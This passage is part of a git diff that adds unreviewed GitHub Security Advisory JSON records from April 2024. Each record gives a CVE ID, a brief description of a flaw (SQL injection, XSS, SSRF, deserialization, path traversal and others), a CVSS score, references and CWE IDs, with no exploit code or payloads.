"type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28944" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-197" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w572-29mg-j3qq/GHSA-w572-29mg-j3qq.json b/advisories/unreviewed/2024/04/GHSA-w572-29mg-j3qq/GHSA-w572-29mg-j3qq.json new file mode 100644 index 00000000000..70bdc3a3511 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w572-29mg-j3qq/GHSA-w572-29mg-j3qq.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w572-29mg-j3qq", + "modified": "2024-04-08T18:30:48Z", + "published": "2024-04-08T18:30:48Z", + "aliases": [ + "CVE-2024-3458" + ], + "details": "A vulnerability classified as critical was found in Netentsec NS-ASG Application Security Gateway 6.3. This vulnerability affects unknown code of the file /admin/add_ikev2.php. The manipulation of the argument TunnelId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259714 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3458" + }, + { + "type": "WEB", + "url": "https://github.com/hundanchen69/cve/blob/main/NS-ASG-sql-add_ikev2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259714" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259714" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312186" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w6hq-2wh4-49vf/GHSA-w6hq-2wh4-49vf.json b/advisories/unreviewed/2024/04/GHSA-w6hq-2wh4-49vf/GHSA-w6hq-2wh4-49vf.json new file mode 100644 index 00000000000..dc729fc510c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w6hq-2wh4-49vf/GHSA-w6hq-2wh4-49vf.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6hq-2wh4-49vf", + "modified": "2024-04-06T12:30:56Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-3377" + ], + "details": "A vulnerability classified as problematic was found in SourceCodester Computer Laboratory Management System 1.0. This vulnerability affects unknown code of the file /classes/SystemSettings.php?f=update_settings. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259498 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3377" + }, + { + "type": "WEB", + "url": "https://github.com/Sospiro014/zday1/blob/main/ear_stord_xss.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259498" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259498" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311155" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w6vh-49p9-j7c9/GHSA-w6vh-49p9-j7c9.json b/advisories/unreviewed/2024/04/GHSA-w6vh-49p9-j7c9/GHSA-w6vh-49p9-j7c9.json new file mode 100644 index 00000000000..5bc1238b6e9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w6vh-49p9-j7c9/GHSA-w6vh-49p9-j7c9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6vh-49p9-j7c9", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2023-40148" + ], + "details": "Server-side request forgery (SSRF) in PingFederate allows unauthenticated http requests to attack network resources and consume server-side resources via forged HTTP POST requests.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40148" + }, + { + "type": "WEB", + "url": "https://docs.pingidentity.com/r/en-us/pingfederate-120/tuj1708533127032" + }, + { + "type": "WEB", + "url": "https://www.pingidentity.com/en/resources/downloads/pingfederate/previous-releases.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T00:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w7w7-xr2r-4x55/GHSA-w7w7-xr2r-4x55.json b/advisories/unreviewed/2024/04/GHSA-w7w7-xr2r-4x55/GHSA-w7w7-xr2r-4x55.json new file mode 100644 index 00000000000..b26202d87cb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w7w7-xr2r-4x55/GHSA-w7w7-xr2r-4x55.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7w7-xr2r-4x55", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2023-52716" + ], + "details": "Vulnerability of starting activities in the background in the ActivityManagerService (AMS) module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52716" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w7x4-hw9x-fprc/GHSA-w7x4-hw9x-fprc.json b/advisories/unreviewed/2024/04/GHSA-w7x4-hw9x-fprc/GHSA-w7x4-hw9x-fprc.json new file mode 100644 index 00000000000..1cf03bd38e9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w7x4-hw9x-fprc/GHSA-w7x4-hw9x-fprc.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7x4-hw9x-fprc", + "modified": "2024-04-08T06:31:30Z", + "published": "2024-04-08T06:31:30Z", + "aliases": [ + "CVE-2024-1958" + ], + "details": "The wpb-show-core WordPress plugin before 2.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1958" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/8be4ebcf-2b42-4b88-89a0-2df6dbf00b55" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w9cw-hv7g-qxq8/GHSA-w9cw-hv7g-qxq8.json b/advisories/unreviewed/2024/04/GHSA-w9cw-hv7g-qxq8/GHSA-w9cw-hv7g-qxq8.json new file mode 100644 index 00000000000..5607eef547d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w9cw-hv7g-qxq8/GHSA-w9cw-hv7g-qxq8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9cw-hv7g-qxq8", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31256" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebinarPress allows Reflected XSS.This issue affects WebinarPress: from n/a through 1.33.9.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31256" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-webinarsystem/wordpress-webinarpress-plugin-1-33-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-w9xx-xhpg-c678/GHSA-w9xx-xhpg-c678.json b/advisories/unreviewed/2024/04/GHSA-w9xx-xhpg-c678/GHSA-w9xx-xhpg-c678.json new file mode 100644 index 00000000000..a695c601fa9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-w9xx-xhpg-c678/GHSA-w9xx-xhpg-c678.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9xx-xhpg-c678", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29748" + ], + "details": "there is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29748" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wc5v-66fr-qmw9/GHSA-wc5v-66fr-qmw9.json b/advisories/unreviewed/2024/04/GHSA-wc5v-66fr-qmw9/GHSA-wc5v-66fr-qmw9.json new file mode 100644 index 00000000000..ad7f2d5df28 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wc5v-66fr-qmw9/GHSA-wc5v-66fr-qmw9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc5v-66fr-qmw9", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31813" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 does not contain an authentication mechanism by default.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31813" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Missing_Authentication/missauth.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wc9x-r2g7-vjwr/GHSA-wc9x-r2g7-vjwr.json b/advisories/unreviewed/2024/04/GHSA-wc9x-r2g7-vjwr/GHSA-wc9x-r2g7-vjwr.json new file mode 100644 index 00000000000..03e8acf2f4d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wc9x-r2g7-vjwr/GHSA-wc9x-r2g7-vjwr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc9x-r2g7-vjwr", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31349" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MailMunch MailMunch – Grow your Email List allows Stored XSS.This issue affects MailMunch – Grow your Email List: from n/a through 3.1.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31349" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/mailmunch/wordpress-mailmunch-grow-your-email-list-plugin-3-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wchq-g5j3-gg9g/GHSA-wchq-g5j3-gg9g.json b/advisories/unreviewed/2024/04/GHSA-wchq-g5j3-gg9g/GHSA-wchq-g5j3-gg9g.json new file mode 100644 index 00000000000..e0ea94ea134 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wchq-g5j3-gg9g/GHSA-wchq-g5j3-gg9g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wchq-g5j3-gg9g", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29066" + ], + "details": "Windows Distributed File System (DFS) Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29066" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29066" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wcvh-xmqp-jw7f/GHSA-wcvh-xmqp-jw7f.json b/advisories/unreviewed/2024/04/GHSA-wcvh-xmqp-jw7f/GHSA-wcvh-xmqp-jw7f.json new file mode 100644 index 00000000000..10e09381539 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wcvh-xmqp-jw7f/GHSA-wcvh-xmqp-jw7f.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcvh-xmqp-jw7f", + "modified": "2024-04-07T18:30:29Z", + "published": "2024-04-07T18:30:29Z", + "aliases": [ + "CVE-2024-3425" + ], + "details": "A vulnerability classified as critical was found in SourceCodester Online Courseware 1.0. Affected by this vulnerability is an unknown functionality of the file admin/activateall.php. The manipulation of the argument selector leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259597 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3425" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-10.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259597" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259597" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311604" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T16:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wfj3-v98m-r3p5/GHSA-wfj3-v98m-r3p5.json b/advisories/unreviewed/2024/04/GHSA-wfj3-v98m-r3p5/GHSA-wfj3-v98m-r3p5.json new file mode 100644 index 00000000000..f7feda94f46 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wfj3-v98m-r3p5/GHSA-wfj3-v98m-r3p5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfj3-v98m-r3p5", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31277" + ], + "details": "Deserialization of Untrusted Data vulnerability in PickPlugins Product Designer.This issue affects Product Designer: from n/a through 1.0.32.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31277" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/product-designer/wordpress-product-designer-plugin-1-0-32-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wfjh-ffgr-5v9q/GHSA-wfjh-ffgr-5v9q.json b/advisories/unreviewed/2024/04/GHSA-wfjh-ffgr-5v9q/GHSA-wfjh-ffgr-5v9q.json new file mode 100644 index 00000000000..30663b3a0c9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wfjh-ffgr-5v9q/GHSA-wfjh-ffgr-5v9q.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfjh-ffgr-5v9q", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30667" + ], + "details": "Insecure deserialization vulnerability in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code or obtain sensitive information via crafted input to the data handling components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30667" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30667" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T08:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wfw8-wpjj-mf7v/GHSA-wfw8-wpjj-mf7v.json b/advisories/unreviewed/2024/04/GHSA-wfw8-wpjj-mf7v/GHSA-wfw8-wpjj-mf7v.json new file mode 100644 index 00000000000..ddca9cde2a8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wfw8-wpjj-mf7v/GHSA-wfw8-wpjj-mf7v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfw8-wpjj-mf7v", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:35Z", + "aliases": [ + "CVE-2024-31850" + ], + "details": "A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31850" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/research/tra-2024-09" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wfx2-88mh-r97m/GHSA-wfx2-88mh-r97m.json b/advisories/unreviewed/2024/04/GHSA-wfx2-88mh-r97m/GHSA-wfx2-88mh-r97m.json new file mode 100644 index 00000000000..5ac03ac06cc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wfx2-88mh-r97m/GHSA-wfx2-88mh-r97m.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfx2-88mh-r97m", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6777" + ], + "details": "The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 9.0.34 due to the plugin adding the API key to several plugin files. This makes it possible for unauthenticated attackers to obtain the developer's Google API key. While this does not affect the security of sites using this plugin, it allows unauthenticated attackers to make requests using this API key with the potential of exhausting requests resulting in an inability to use the map functionality offered by the plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6777" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058300%40wp-google-maps&new=3058300%40wp-google-maps&sfp_email=&sfph_mail=#file673" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/509cccbd-3aa0-45f1-84a0-387d678ebf65?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wg24-v48r-f3mm/GHSA-wg24-v48r-f3mm.json b/advisories/unreviewed/2024/04/GHSA-wg24-v48r-f3mm/GHSA-wg24-v48r-f3mm.json new file mode 100644 index 00000000000..c9a40e0b975 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wg24-v48r-f3mm/GHSA-wg24-v48r-f3mm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wg24-v48r-f3mm", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26122" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26122" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wgrq-q2w8-p9x4/GHSA-wgrq-q2w8-p9x4.json b/advisories/unreviewed/2024/04/GHSA-wgrq-q2w8-p9x4/GHSA-wgrq-q2w8-p9x4.json new file mode 100644 index 00000000000..40a636bd559 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wgrq-q2w8-p9x4/GHSA-wgrq-q2w8-p9x4.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgrq-q2w8-p9x4", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-23086" + ], + "details": "Apfloat v1.10.1 was discovered to contain a stack overflow via the component org.apfloat.internal.DoubleModMath::modPow(double.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23086" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/63ad1a4d1e3955043b7a90fdbf36676b" + }, + { + "type": "WEB", + "url": "https://github.com/mtommila/apfloat" + }, + { + "type": "WEB", + "url": "http://apfloat.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wh4m-6rh3-p4rq/GHSA-wh4m-6rh3-p4rq.json b/advisories/unreviewed/2024/04/GHSA-wh4m-6rh3-p4rq/GHSA-wh4m-6rh3-p4rq.json new file mode 100644 index 00000000000..880af75c08a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wh4m-6rh3-p4rq/GHSA-wh4m-6rh3-p4rq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh4m-6rh3-p4rq", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20758" + ], + "details": "Adobe Commerce versions 2.4.6-p4, 2.4.5-p6, 2.4.4-p7, 2.4.7-beta3 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, but the attack complexity is high.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20758" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/magento/apsb24-18.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wh8c-8787-2j2f/GHSA-wh8c-8787-2j2f.json b/advisories/unreviewed/2024/04/GHSA-wh8c-8787-2j2f/GHSA-wh8c-8787-2j2f.json new file mode 100644 index 00000000000..c14264e34e2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wh8c-8787-2j2f/GHSA-wh8c-8787-2j2f.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh8c-8787-2j2f", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52349" + ], + "details": "In ril service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52349" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wj9q-7qxv-7f57/GHSA-wj9q-7qxv-7f57.json b/advisories/unreviewed/2024/04/GHSA-wj9q-7qxv-7f57/GHSA-wj9q-7qxv-7f57.json new file mode 100644 index 00000000000..8c75d33bb44 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wj9q-7qxv-7f57/GHSA-wj9q-7qxv-7f57.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj9q-7qxv-7f57", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-3359" + ], + "details": "A vulnerability, which was classified as critical, has been found in SourceCodester Online Library System 1.0. This issue affects some unknown processing of the file admin/login.php. The manipulation of the argument user_email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259463.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3359" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Online-Library-System-01" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310423" + } + ], + "database_specific": { + "cwe_ids": [ + 